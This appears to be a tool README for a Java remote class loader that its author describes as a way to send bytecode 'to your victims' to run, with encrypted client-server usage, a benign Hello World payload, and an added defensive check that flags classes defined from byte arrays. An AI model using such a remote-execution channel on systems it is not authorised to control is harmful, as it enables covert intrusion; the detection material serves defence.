Java-Remote-Class-Loader – Tool to send Java bytecode to your victims to load and execute using Java ClassLoader together with Reflect API

This tool allows you to send Java bytecode in the form of class files to your clients (or potential targets) to load and execute using Java ClassLoader together with Reflect API. The client receives the class file from the server and returns the respective execution output. Payloads must be written in Java and compiled before starting the server.

# Features

* Client-server architecture
* Remote loading of Java class files
* In-transit encryption using ChaCha20 cipher
* Settings defined via args
* Keepalive mechanism to re-establish communication if server restarts

# Installation

The tool has been tested using OpenJDK 11 with JRE Java Package, both on Windows and Linux (zip portable version). Java version should be 11 or higher due to dependencies.

# Usage

```
$ java -jar java-class-loader.jar -help

usage: Main
 -address        address to connect (client) / to bind (server)
 -classfile      filename of bytecode .class file to load remotely
                 (default: Payload.class)
 -classmethod    name of method to invoke (default: exec)
 -classname      name of class (default: Payload)
 -client         run as client
 -help           print this message
 -keepalive      keeps the client getting classfile from server every
                 X seconds (default: 3 seconds)
 -key            secret key – 256 bits in base64 format (if not
                 specified it will generate a new one)
 -port           port to connect (client) / to bind (server)
 -server         run as server
```

# Example

Assuming you have the following Hello World payload in the `Payload.java` file:

```java
// Payload.java
public class Payload {
    public static String exec() {
        String output = "";
        try {
            output = "Hello world from client!";
        } catch (Exception e) {
            e.printStackTrace();
        }
        return output;
    }
}
```

Then you should compile and produce the respective `Payload.class` file.

To run the server process listening on port 1337 on all network interfaces:

```
$ java -jar java-class-loader.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.class

Running as server
Server running on 0.0.0.0:1337
Generated new key: TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=
```

On the client side, you may use the same JAR package with the `-client` flag and use the symmetric key generated by the server. Specify the server IP address and port to connect to. You may also change the class name and class method (defaults are `Payload` and `String exec()` respectively). Additionally, you can specify `-keepalive` to keep the client requesting the class file from the server while maintaining the connection.

```
$ java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 -key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

Running as client
Connecting to 192.168.1.73:1337
Received 593 bytes from server
Output from invoked class method: Hello world from client!
Sent 24 bytes to server
```
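
From the defending side, a class that is handed to the JVM as a byte array, as in the exchange above, usually has no code source location, unlike a class read from a JAR or directory. The following added example (not the tool's code; `Sample`, `BytesLoader` and `definedFromBytes` are hypothetical names) shows a check for that property, assuming the loader calls `defineClass` without an explicit `ProtectionDomain`; compile it with `javac` on JDK 11 or later before running.

```java
import java.io.InputStream;
import java.security.CodeSource;

// Stand-in for a class that normally ships with the application (hypothetical).
class Sample {
    public static String exec() { return "ok"; }
}

public class ByteDefinedClassCheck {

    // Minimal loader that defines a class straight from a byte array,
    // the same JVM entry point a network class loader ends up calling.
    static class BytesLoader extends ClassLoader {
        Class<?> define(String name, byte[] bytes) {
            return defineClass(name, bytes, 0, bytes.length);
        }
    }

    // True when a non-JDK class has no code source location (no JAR or
    // directory it was read from), which is the case for byte-array classes
    // defined without an explicit ProtectionDomain.
    static boolean definedFromBytes(Class<?> c) {
        if (c.getClassLoader() == null) {
            return false; // bootstrap classes legitimately report no code source
        }
        CodeSource cs = c.getProtectionDomain().getCodeSource();
        return cs == null || cs.getLocation() == null;
    }

    public static void main(String[] args) throws Exception {
        // Constructed input: reuse Sample's own compiled bytes from the classpath.
        byte[] bytes;
        try (InputStream in = ByteDefinedClassCheck.class.getClassLoader()
                .getResourceAsStream("Sample.class")) {
            bytes = in.readAllBytes();
        }
        Class<?> fromBytes = new BytesLoader().define("Sample", bytes);

        System.out.println("Sample (classpath): " + definedFromBytes(Sample.class));
        System.out.println("Sample (byte[]):    " + definedFromBytes(fromBytes));
    }
}
```

Frameworks that generate bytecode at runtime can also produce classes without a code source location, so treat a hit as a triage signal rather than proof.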

# References

Refer to for a blog post related with the development of this tool.

